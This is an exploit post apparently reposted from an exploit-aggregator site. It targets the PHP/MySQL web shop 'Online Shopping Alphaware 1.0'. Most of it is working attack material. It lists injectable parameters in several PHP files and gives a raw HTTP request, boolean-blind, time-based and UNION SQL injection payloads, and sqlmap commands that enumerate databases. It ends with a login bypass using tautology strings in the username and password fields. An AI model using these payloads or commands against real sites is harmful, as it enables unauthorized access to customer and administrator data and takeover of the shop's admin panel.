Exploit for Online Shopping Alphaware 1.0 SQL Injection Vulnerability

Name: Exploit for Online Shopping Alphaware 1.0 SQL Injection Vulnerability
Rating: 5 (166 reviews)
2020-08-06 | CVSS 0.1
## https://sploitus.com/exploit?id=1337DAY-ID-34804
# Exploit Title: Online Shopping Alphaware 1.0  -  Multiple SQL Injection Vulnerabilty
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On Windows & Linux Server

-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: summary.php
# Vulnerable parameter : 
  - tid

# PoC

URL : http://example.com/alphaware/summary.php?tid=1337 [SQLi]

# Burpsuite Requests

GET /alphaware/summary.php?tid=-3488%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171626a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x716b706b71%29%2CNULL%2CNULL--%20- HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4
Cookie: PHPSESSID=tp5rtgrqhq6mtcgrlv2ouo583n
Host: example.com
Accept: */*
Accept-encoding: gzip,deflate
Connection: close


# Payload

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://example.com/alphaware/summary.php?tid=73' AND 4766=4766 AND 'eIaZ'='eIaZ
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://example.com/alphaware/summary.php?tid=73' AND (SELECT 5482 FROM (SELECT(SLEEP(5)))PeLB) AND 'zQKr'='zQKr
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://example.com/alphaware/summary.php?tid=-4244' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x6573676f5948464d524243677248444168457a566250595976774178415053687041507a69507642,0x716b706b71),NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL-- -



# Sqlmap

sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3


-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: confirm.php
# Vulnerable parameter : 
  - id

# PoC

URL : http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]


# Payload

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa


# Sqlmap


sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3

-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: details.php
# Vulnerable parameter : id

# PoC

URL : http://example.com/alphaware/details.php?id=1337 [SQLi]


# Payload

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://example.com/alphaware/details.php?id=1337' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))ogoi) AND 'vASd'='vASd
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: http://example.com/alphaware/details.php?id=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766b7871,0x6350686f52454b775559486d4a456859414a61424a6c724b72624f6d4554555471764a4d724a726f,0x71716b7171),NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -

# Sqlmap

sqlmap -u "http://example.com/alphaware/details.php?id=1337*" --dbs --random-agent -v 3



-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerable file: confirm.php
# Vulnerable parameter : 
  - id

# PoC

URL : 
- http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]
- http://example.com/alphaware/admin/cancel.php?id=[SQLi]
- http://example.com/alphaware/admin/receipt.php?tid=[SQLi]



# Payload

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa


# Sqlmap

sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3



-------------------------------------------------------------------------------------------------------------------------------------

URL : http://example.com/alphaware/admin/

Bypass Login Using SQL on Admin/Member

Logging in with following details:
Username : ' or ''='
Password : ' or ''='

#  0day.today [2020-08-10]  #